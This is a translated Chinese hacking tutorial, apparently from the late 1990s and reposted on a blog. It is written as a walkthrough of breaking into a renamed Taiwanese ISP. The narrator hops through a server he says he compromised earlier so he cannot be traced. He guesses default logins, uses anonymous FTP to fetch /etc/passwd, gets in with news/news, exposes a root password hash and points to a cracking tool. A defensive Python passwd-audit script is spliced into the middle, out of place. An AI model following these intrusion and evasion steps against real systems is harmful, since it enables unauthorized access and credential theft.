[Preface]

I did not write this article in order to teach anyone. Personally I feel that although Taiwan's network has developed quite a bit, people are indifferent to the importance of network security, or simply lack the knowledge, and that is a very dangerous state of affairs. Universities, government agencies, companies, even network operators and ISPs are badly short of proper concepts and attitudes toward network security and system administration. So in the days to come it may take only one PC and one modem to bring the whole Taiwanese network down, maybe even set off an economic crisis!! It is like a child wandering down the street holding a gun. Too bad!! So I wrote this article purely for the sake of Taiwan's network security, and I do not want anyone to do anything illegal because of it, least of all damaging other people's systems or files!!
Of course, if someone does do something illegal because of it, I take no responsibility whatsoever!!!
"Water can carry a boat and can also capsize it." This only tells you how hackers break into your system.

[Topic]

Intrusion

[Difficulty]

Normal

[Description]

I haven't written an article in a long time. Recently I set up a site together with a few net friends, so I have started writing again. It is a bit painful, but I hope it helps friends who are interested in network security. Of course, we have to start with the most basic stuff first.

[Getting started]

The most basic tools of all are telnet and ftp; the two of them are great helpers for intrusion ^^. There are many telnet versions on the net: colour ones, Chinese-compatible ones, lots and lots. But if you don't want to spend time downloading one, no problem!! MS-DOS under Windows also provides a usable telnet program, and of course ftp too!!
If you have telnet software, open it; if not, use the MS-DOS telnet: just type telnet at the MS-DOS prompt. Then let's begin, heh heh.
First connect to your own host, or to one you are allowed to use.

SunOS 5.6

login: Love-gone
Password:
Last login: Sun May 10 15:01:45 from 111.222.333.444
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/Love-gone"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.

(Hee hee, this is one I broke into before; now I use it as an intermediate server. Of course I have changed the IP and the account, how could I use the real IP!! This system is quite famous; I think anyone who lives in Taiwan knows this organization, but I can't say which. Heh.)

>who (first check who is on this host right now)
judge4 pts/1 May 10 15:17 (111.222.333.444)
root console May 9 12:24 (:0)
root pts/9 May 9 12:24 (:0.0)

(Looks like nobody on the host will notice me right now, heh, so I can safely connect to this time's target. Hmm, this time the target is www.fatman.com.tw. Heh, don't panic, that hostname is one I have already changed.)

>telnet www.fatman.com.tw (telnet over first)

Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.

fatman login: guest (first try the public account guest)
Password:
Login incorrect (ah, no luck, never mind, I'll try again)

fatman login: news
Password:
Connection closed by foreign host.

(Wow, kicked out after only two failures. This system is really harsh @&!J#~!)

> telnet www.fatman.com.tw (never mind, let's play with it some more)

Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.

fatman login: fatman (a hacker's sixth sense...)
Passwd:
Login incorrect

fatman login: system (this is a default system account...)
Passwd:
Login incorrect (looks like it has been changed..)
Connection closed by foreign host.
>ftp www.fatman.com.tw (switch to ftp and see)

Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman有夠爛服務有限公司
220-
220- 高雄 FTP server
220-
220- There are 4 users in FTP Server now.
220- 目前已有 4 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 15:53:37 CST 1996) ready.
User (www.fatman.com.tw:(none)): fatman (still try the company name once)
331 Password required for fatman.
Password:
530 Login incorrect. (failed again, my luck doesn't seem too good today)
Login failed.
ftp> user anonymous (let's try the public account anonymous)
331 Guest login ok, send your complete e-mail address as password.
Password: (type any password; just don't be silly enough to type your real e-mail, qq@ will do)
230 Guest login ok, access restrictions apply.
ftp>pwd

(Finally in, that was hard work. First let's see which directory I'm in.)

257 "/" is current directory.
ftp> ls -la

(look for the target, /etc)

200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 8
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 bin
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 etc
drwxrwxr-x 2 root wheel 1024 Dec 3 1993 incoming
drwxrwxr-x 2 root wheel 1024 Nov 17 1993 lib
drwxrwxr-x 2 root wheel 1024 Feb 2 01:20 pub
drwxrwxr-x 3 root wheel 1024 Jun 10 1996 usr
226 Transfer complete.
491 bytes received in 3.13 seconds (0.16 Kbytes/sec)

(Hee hee, found the target..)

ftp> cd etc

(attack straight in)

250 CWD command successful. (Hmm, I can get in...)
ftp> ls -la

(Check again whether the password file we want, /etc/passwd, is there)

200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 4
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
-rwxrwxr-x 1 root wheel 258 Dec 3 1993 group
-rwxrwxr-x 1 root wheel 532 Dec 3 1993 passwd
226 Transfer complete.
251 bytes received in 0.00 seconds (251000.00 Kbytes/sec)

(No way, it can't be that easy)

ftp> get passwd

(Without a second thought, grab the password file right away, heh heh.)

200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (321 bytes).
226 Transfer complete.
5515 bytes received in 1.60 seconds (1.01 Kbytes/sec)

ftp>bye
221 Goodbye.

(leave immediately)

>cat passwd

(Let's take a look at the password file we just got...)

root:*:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
[remainder omitted]

(Damn, it's a shadowed password file, no wonder it could be fetched with anonymous. With only this there is no way to crack the passwords. But from the accounts in it we can learn which services fatman provides, such as uucp, mail, ftp, news...
operator is for booting, so it's no use; daemon is used to assign the permissions of each account.)

>rm passwd

(better delete it anyway...)

>^D

(So tired. Let's stop here for now; at least you now know how to get into a system.)

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-**-*-*-*-*-*-*-*-*-*-*-*
[Break]
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*--*-*-*-*-*-*-*-*-*-*-*-*-*-*

Hmm, continuing the topic I didn't finish last time..
Last time we got the shadowed /etc/passwd!! Don't think it is useless, heh heh. Although it can't be used directly to crack passwords, it did collect some information about the system for us. Now let's take it out and have a look...


SunOS 5.6

login: Love-gone
Password:
Last login: Sun May 10 15:01:45 from 111.222.333.444
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/Love-gone"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.

(Same as before, connect to the intermediate server first. This makes sure I don't leave my own IP on the system being attacked, so nobody can trace back along the chain to find me. And the more intermediate servers the better!!)

>who

(still check whether it's safe)

judge4 pts/1 May 10 15:17 (111.222.333.444)
root console May 9 12:24 (:0)
root pts/9 May 9 12:24 (:0.0)

(still nobody minding the store)

>telnet www.fatman.com.tw

(the attack begins...)


Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.

fatman login:nobody (first try the accounts from the shadowed password file)
Password: (type nobody for the password too...)
Login incorrect

fatman login:news (try this one too..)
Password: (news as well..)

Linux 2.0.29.
You have mail.

(Whoa!!!! I'm in.... Just don't read other people's mail.)

fatman:~$ cd /etc (see if I can get in)
fatman:/etc$ ls

(take a look...)


DIR_COLORS hosts passwd.old
HOSTNAME hosts.allow passwd.save
HOSTNAME~ hosts.allow~ passwd~
NETWORKING hosts.deny ppp/
NNTP_INEWS_DOMAIN hosts.equiv printcap
X11@ hosts.lpd profile
aliases inet@ protocols
aliases.dir inetd.conf psdevtab
aliases.pag inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab inittab~ resolv.conf~
csh.cshrc ioctl.save rpc
csh.login issue securetty
default/ issue.net@ securetty.old
diphosts issue~ sendmail.cf
exports klogd.pid sendmail.st
fastboot ld.so.cache services
fdprm ld.so.conf shells
fs/ lilo/ skel/
fstab lilo.conf slip.hosts
ftp.banner localtime slip.login
ftp.deny magic snooptab
ftp.pids-local mail.rc sudoers
ftp.pids-remote motd syslog.conf
ftpaccess motd.bak syslog.pid
ftpconversions msgs/ termcap
ftpgroups mtab ttys
ftpusers.old mtools utmp@
gateways named.boot.bak vga/
gettydefs networks wtmp@
group nntpserver yp.conf.example
group~ passwd
host.conf passwd.OLD
fatman:/etc$ cat passwd

(Next, look straight at the passwords...)


root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
[remainder omitted; I have mosaicked the password file as much as I could]

(Wow.... excellent!! Quickly switch to ftp and show off~~~)

fatman:/etc$ ^C
>ftp www.fatman.com.tw

(Brother ftp is here...)


Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman有夠爛服務有限公司
220-
220- 高雄 FTP server
220-
220- There are 4 users in FTP Server now.
220- 目前已有 4 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 16:53:37 CST 1996) ready.
User (www.fatman.com.tw:(none)): news (use the one from the break-in just now..)
331 Password required for news.
Password:
331 news login ok!
ftp>cd /etc
250 CWD command successful.
ftp>get passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (5921 bytes).
226 Transfer complete.
5515 bytes received in 2.80 seconds (1.97 Kbytes/sec)
ftp>bye

(Run away, scram!!)

221 Goodbye.

(Now that /etc/passwd is in hand, you should know what comes next.. What?? You don't??? Then let me explain it here...)

[Love-gone's notes]

After getting the password file (/etc/passwd), what you do is crack it... It seems I have to explain the format and meaning of passwd here...

For example:
root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
Most password files look like this. Each field is separated by a colon, usually six colons in all. Of course there are many password-file formats; as far as I know I have seen five so far, but the six-colon kind is by far the most common. The meaning of each field is as follows..

root: the user name
L3mUc0CQtJbtQ: the encoded password (coded-password)
0: UID (User Identification Number), the user's identifier
0: GID, the identifier of the user's group
root: comments, the comment field; it may hold a phone number or an address
/root: home directory, the so-called home directory, i.e. your working directory
/bin/bash: this field is the first program run after the user logs in to the system

Because it is a one-way encoded password (One-Way Passwd), it cannot be decoded back.... all you can do is use so-called brute-force cracking.. There are many brute-force cracking programs; I won't discuss them here! I think you know them all already.. What?? You say I'm heartless??.. Fine!! I'll suggest the one I use: John 4.0
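To turn the format above into a check a defender can run, here is an added example (my own code, not from the original article or from any tool it mentions) that parses the seven-field /etc/passwd layout just described and reports the conditions that made the fatman break-in possible: password hashes readable in the file instead of /etc/shadow, empty password fields, extra UID 0 accounts, and two names sharing one UID. The sample file is constructed, with made-up hash values.

```python
from collections import Counter

# Constructed sample (made-up hashes) in the seven-field format the article explains.
SAMPLE_PASSWD = """\
root:Ab3kQv9zLmN7c:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
www:x:502:20:WWW Manager:/home/staff/www:/bin/bash
kingtel:Zq8tRv2pWnM4e:530:100:kingtel:/home/w3/kingtel:/bin/bash
cp:Hy5cLd7sBkQ1o:530:100:kingtel:/home/w3/kingtel:/bin/bash
backup::0:0:backup:/root:/bin/bash
"""
FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Split each non-empty line into the seven colon-separated fields."""
    entries = []
    for line in filter(None, text.splitlines()):
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            raise ValueError(f"malformed passwd line: {line!r}")
        entry = dict(zip(FIELDS, parts))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entries.append(entry)
    return entries


def classify_password(field):
    """What the second field means to someone who can read the file."""
    if field == "":
        return "empty"      # no password at all
    if field == "x":
        return "shadowed"   # hash kept in /etc/shadow, out of anonymous ftp's reach
    if field.startswith(("*", "!")):
        return "locked"     # not a valid hash, so password login is impossible
    return "exposed"        # a crypt(3) hash anyone holding the file can attack offline


def audit_passwd(text):
    """Return (account, issue) pairs a sysadmin should act on."""
    entries = parse_passwd(text)
    uid_count = Counter(e["uid"] for e in entries)
    findings = []
    for e in entries:
        kind = classify_password(e["password"])
        if kind == "exposed":
            findings.append((e["name"], "exposed-hash"))   # move it to /etc/shadow
        elif kind == "empty":
            findings.append((e["name"], "empty-password"))
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra-uid0"))     # a second superuser
        if uid_count[e["uid"]] > 1:
            findings.append((e["name"], "shared-uid"))     # two names, one identity
    return findings
```

Run `audit_passwd` over a real file after stripping nothing; the "exposed-hash" findings are exactly the lines an anonymous FTP download would hand to a cracker.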


[Closing thoughts]

Sigh.. from this article you can tell that network security in Taiwan is done very poorly; even an ISP that provides dial-up can be broken into this easily.. How sad.


Posted by Neo Chao on PIXNET (痞客邦)